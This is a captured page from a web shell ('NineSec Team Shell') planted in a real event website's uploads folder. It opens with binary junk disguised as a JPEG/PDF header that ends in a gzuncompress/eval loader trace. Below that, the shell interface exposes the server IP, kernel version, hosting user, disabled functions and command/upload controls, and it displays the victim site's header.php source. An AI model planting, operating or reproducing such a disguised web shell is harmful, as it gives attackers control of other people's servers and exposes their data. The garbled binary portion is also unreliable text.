JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 C  %PDF-1.3 % 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream x\mo7 a?Hyi{$E(i?ckrAvEzFHI|H?{|Z|X|Ň77?Oݞ__lOя77wx'?Ű8I] gQB2za]l|ɇ՟?} " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress
Warning: file_get_contents(test.txt): Failed to open stream: No such file or directory in /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/1770357389_0_197006009.php(44) : eval()'d code on line 6
NineSec Team Shell
NineSec Team Shell
Server IP : 82.25.113.252  /  Your IP : 216.73.216.172
Web Server : LiteSpeed
System : Linux fr-int-web2058.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u178500310 ( 178500310)
PHP Version : 8.2.29
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/../includes/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/../includes/header.php
<?php
// Secure session start with check for existing session
if (session_status() === PHP_SESSION_NONE) {
    session_start([
        'cookie_httponly' => true,
        'cookie_secure' => true,
        'cookie_samesite' => 'Strict',
        'use_strict_mode' => true
    ]);
}

// Generate CSRF token if not exists
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// Security headers
header("X-Frame-Options: DENY");
header("X-Content-Type-Options: nosniff");
header("X-XSS-Protection: 1; mode=block");
header("Referrer-Policy: strict-origin-when-cross-origin");
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Let's Break the World Record | World Record Event</title>
    <meta name="description" content="Join 14,000 people in an interfaith foot washing ceremony to break the Guinness World Record for global healing and unity">
    <meta name="keywords" content="world record, foot washing, interfaith, healing, Ghana, Princess Asie Ocansey">
    <meta name="robots" content="index, follow">
    
    <!-- CSRF Token Meta Tag -->
    <meta name="csrf-token" content="<?php echo htmlspecialchars($_SESSION['csrf_token'], ENT_QUOTES, 'UTF-8'); ?>">
    
    <!-- Open Graph Meta Tags -->
    <meta property="og:title" content="Let's Break the World Record | World Record Event">
    <meta property="og:description" content="Join 14,000 people in an interfaith foot washing ceremony to break the Guinness World Record">
    <meta property="og:type" content="website">
    <meta property="og:url" content="<?php echo htmlspecialchars((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]", ENT_QUOTES, 'UTF-8'); ?>">
    
    <!-- Favicon -->
    <link rel="icon" type="image/x-icon" href="/favicon.ico">
    
    <!-- CSS -->
    <link rel="stylesheet" href="css/style.css">
    
    <!-- Font Awesome for Icons -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha512-iecdLmaskl7CVkqkXNQ/ZH/XLlvWZOJyj7Yy7tcenmpD1ypASozpmT/E0iPtmFIB46ZmdtAc9eNBvH0H/ZpiBw==" crossorigin="anonymous" referrerpolicy="no-referrer">
    
    <!-- Preload critical resources -->
    <link rel="preload" href="css/style.css" as="style">
</head>
<body>
    <!-- Skip to main content for accessibility -->
    <a href="#main-content" class="skip-link">Skip to main content</a>
    
    <nav class="navbar" role="navigation" aria-label="Main navigation">
        <div class="container">
            <div class="nav-brand">
                <h2>Let's Break</h2>
                <span>Break the World Record</span>
            </div>
            
            <!-- Mobile menu button -->
            <button class="nav-toggle" aria-expanded="false" aria-controls="nav-menu" aria-label="Toggle navigation">
                <span class="hamburger"></span>
                <span class="hamburger"></span>
                <span class="hamburger"></span>
            </button>
            
            <ul class="nav-menu" id="nav-menu" role="menubar">
                <li role="none"><a href="index.php" role="menuitem" aria-current="<?php echo basename($_SERVER['PHP_SELF']) === 'index.php' ? 'page' : 'false'; ?>">Home</a></li>
                <li role="none"><a href="about.php" role="menuitem" aria-current="<?php echo basename($_SERVER['PHP_SELF']) === 'about.php' ? 'page' : 'false'; ?>">About</a></li>
                <li role="none"><a href="participants.php" role="menuitem" aria-current="<?php echo basename($_SERVER['PHP_SELF']) === 'participants.php' ? 'page' : 'false'; ?>">Participants</a></li>
                <li role="none"><a href="events.php" role="menuitem" aria-current="<?php echo basename($_SERVER['PHP_SELF']) === 'events.php' ? 'page' : 'false'; ?>">Events</a></li>
                <li role="none"><a href="gallery.php" role="menuitem" aria-current="<?php echo basename($_SERVER['PHP_SELF']) === 'gallery.php' ? 'page' : 'false'; ?>">Gallery</a></li>
                <li role="none"><a href="volunteer_register.php" role="menuitem" aria-current="<?php echo basename($_SERVER['PHP_SELF']) === 'volunteer_register.php' ? 'page' : 'false'; ?>">Be Our Volunteer</a></li>
                
                <?php if (isset($_SESSION['user_id'])): ?>
                    <li role="none" class="nav-user">
                        <a href="dashboard.php" role="menuitem">
                            <i class="fas fa-user-circle"></i>
                            Dashboard
                        </a>
                    </li>
                    <?php if (isset($_SESSION['is_admin']) && $_SESSION['is_admin']): ?>
                        <li role="none"><a href="admin/" role="menuitem">Admin Panel</a></li>
                    <?php endif; ?>
                    <li role="none"><a href="logout.php" role="menuitem">Logout</a></li>
                <?php else: ?>
                    <li role="none"><a href="register.php" role="menuitem">Register</a></li>
                    <li role="none"><a href="login.php" role="menuitem">Login</a></li>
                <?php endif; ?>
            </ul>
        </div>
    </nav>

    <main id="main-content" role="main">

<style>
    /* Accessibility and Mobile Navigation Styles */
    .skip-link {
        position: absolute;
        top: -40px;
        left: 6px;
        background: #000;
        color: white;
        padding: 8px;
        text-decoration: none;
        z-index: 10000;
        transition: top 0.3s;
    }

    .skip-link:focus {
        top: 6px;
    }

    /* Mobile Navigation */
    .nav-toggle {
        display: none;
        flex-direction: column;
        background: none;
        border: none;
        cursor: pointer;
        padding: 5px;
        margin-left: auto;
    }

    .hamburger {
        width: 25px;
        height: 3px;
        background: var(--primary);
        margin: 3px 0;
        transition: 0.3s;
    }

    .nav-toggle[aria-expanded="true"] .hamburger:nth-child(1) {
        transform: rotate(-45deg) translate(-5px, 6px);
    }

    .nav-toggle[aria-expanded="true"] .hamburger:nth-child(2) {
        opacity: 0;
    }

    .nav-toggle[aria-expanded="true"] .hamburger:nth-child(3) {
        transform: rotate(45deg) translate(-5px, -6px);
    }

    .nav-user a {
        display: flex;
        align-items: center;
        gap: 8px;
        font-weight: 600;
        color: var(--primary);
    }

    .nav-user i {
        font-size: 1.2rem;
    }

    /* Responsive Design */
    @media (max-width: 768px) {
        .nav-toggle {
            display: flex;
        }

        .nav-menu {
            position: fixed;
            top: 70px;
            left: 0;
            right: 0;
            background: white;
            flex-direction: column;
            padding: 20px;
            box-shadow: 0 5px 15px rgba(0,0,0,0.1);
            transform: translateY(-100%);
            opacity: 0;
            visibility: hidden;
            transition: all 0.3s ease-in-out;
            z-index: 1000;
        }

        .nav-menu[aria-expanded="true"] {
            transform: translateY(0);
            opacity: 1;
            visibility: visible;
        }

        .nav-menu li {
            margin: 10px 0;
        }

        .nav-menu a {
            padding: 12px 15px;
            border-radius: 5px;
            transition: background-color 0.3s;
        }

        .nav-menu a:hover,
        .nav-menu a:focus {
            background-color: var(--light-gray);
        }

        .nav-brand h2 {
            font-size: 1.5rem;
        }

        .nav-brand span {
            font-size: 0.9rem;
        }
    }

    @media (max-width: 480px) {
        .navbar .container {
            padding: 0 15px;
        }

        .nav-brand h2 {
            font-size: 1.3rem;
        }

        .nav-brand span {
            font-size: 0.8rem;
        }
    }

    /* High contrast mode support */
    @media (prefers-contrast: high) {
        .nav-menu a {
            border: 1px solid transparent;
        }

        .nav-menu a:hover,
        .nav-menu a:focus {
            border-color: currentColor;
        }
    }

    /* Reduced motion support */
    @media (prefers-reduced-motion: reduce) {
        .nav-menu,
        .skip-link {
            transition: none;
        }
    }
</style>

<script>
    // Mobile navigation functionality
    document.addEventListener('DOMContentLoaded', function() {
        const navToggle = document.querySelector('.nav-toggle');
        const navMenu = document.querySelector('.nav-menu');
        
        if (navToggle && navMenu) {
            navToggle.addEventListener('click', function() {
                const isExpanded = this.getAttribute('aria-expanded') === 'true';
                this.setAttribute('aria-expanded', !isExpanded);
                navMenu.setAttribute('aria-expanded', !isExpanded);
            });
            
            // Close mobile menu when clicking on a link
            navMenu.addEventListener('click', function(e) {
                if (e.target.tagName === 'A') {
                    navToggle.setAttribute('aria-expanded', 'false');
                    navMenu.setAttribute('aria-expanded', 'false');
                }
            });
            
            // Close mobile menu when pressing Escape key
            document.addEventListener('keydown', function(e) {
                if (e.key === 'Escape' && navToggle.getAttribute('aria-expanded') === 'true') {
                    navToggle.setAttribute('aria-expanded', 'false');
                    navMenu.setAttribute('aria-expanded', 'false');
                    navToggle.focus();
                }
            });
        }
        
        // Focus trapping for mobile menu
        function trapFocus(element) {
            const focusableElements = element.querySelectorAll(
                'a[href], button, textarea, input, select, [tabindex]:not([tabindex="-1"])'
            );
            const firstElement = focusableElements[0];
            const lastElement = focusableElements[focusableElements.length - 1];
            
            element.addEventListener('keydown', function(e) {
                if (e.key === 'Tab') {
                    if (e.shiftKey) {
                        if (document.activeElement === firstElement) {
                            e.preventDefault();
                            lastElement.focus();
                        }
                    } else {
                        if (document.activeElement === lastElement) {
                            e.preventDefault();
                            firstElement.focus();
                        }
                    }
                }
            });
        }
        
        if (navMenu) {
            trapFocus(navMenu);
        }
    });
</script>

NineSec Team - 2022